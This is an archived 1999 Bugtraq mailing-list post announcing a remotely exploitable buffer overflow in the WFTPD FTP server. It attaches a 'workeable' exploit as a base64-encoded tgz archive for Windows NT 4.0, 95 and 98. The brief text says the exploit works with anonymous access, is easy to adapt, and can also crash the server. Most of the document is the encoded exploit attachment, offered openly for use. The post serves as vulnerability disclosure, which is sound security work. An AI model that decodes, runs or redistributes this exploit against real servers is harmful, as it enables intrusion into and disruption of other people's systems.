[12444] in bugtraq
Re: WFTPD v2.40 FTPServer remotely exploitable buffer overflow
daemon@ATHENA.MIT.EDU (Alberto =?iso-8859-1?Q?Soli=F1o?=)
Thu Nov 4 16:59:25 1999
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="------------0AF2746F5DAC68B172E36653"
Message-Id: <3821ED84.CE8C4A09@core-sdi.com>
Date: Thu, 4 Nov 1999 16:59:26 -0300
Reply-To: Alberto =?iso-8859-1?Q?Soli=F1o?= <core.lists.bugtraq@CORE-SDI.COM>
From: Alberto =?iso-8859-1?Q?Soli=F1o?= <core.lists.bugtraq@CORE-SDI.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
This is a multi-part message in MIME format.
--------------0AF2746F5DAC68B172E36653
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable
X-MIME-Autoconverted: from 8bit to quoted-printable by core-sdi.com id QAA20747
Hi:
This message attaches a workeable WFTPD 2.34 exploit for WIN NT 4.0
[SP3-4], Windows 95, Windows 98.
In order to make it work, the attacker must have access (eg: the exploit
works with anonymous access but it's easy to change, look at the source
code).
An interesting point is that if you don't have an account on the server
and also tries to run the exploit the server stops answering requests
and
makes a GPF when the administrator of the server exits WFTPD.
--=20
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D[ CORE Seguridad de=
la Informacion S.A. ]=3D=3D=3D=3D=3D=3D=3D=3D=3D
Alberto Soli=F1o email : asolino@core-sdi.com
Pte. Juan D. Peron 315 Piso 4 UF 17 www.core-sdi.com
1038 Capital Federal
Buenos Aires, Argentina. Tel/Fax : +(54.11)43.31.54.02
Casilla de Correos 877 (1000) Correo Central
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
--
"Simplicity is the highest goal, achievable when you have overcome=20
all difficulties." F. Chopin
--------------0AF2746F5DAC68B172E36653
Content-Type: application/x-compressed;
name="wftpdexp.tgz"
Content-Disposition: inline;
filename="wftpdexp.tgz"
Content-Transfer-Encoding: base64
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
bdu2bdu2bdu2bdu2bdu2bdufrv0HjJoinwBQAAA=
--------------0AF2746F5DAC68B172E36653--
--- For a personal reply use asolino@core-sdi.com
